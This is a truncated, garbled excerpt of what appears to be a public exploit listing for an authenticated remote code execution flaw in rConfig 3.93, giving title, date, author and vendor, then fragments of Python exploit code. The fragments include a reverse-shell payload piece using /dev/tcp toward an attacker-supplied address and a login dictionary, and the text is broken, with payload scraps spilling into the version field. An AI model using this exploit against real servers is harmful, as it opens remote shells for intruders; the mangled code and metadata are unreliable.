rConfig 3.93 Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...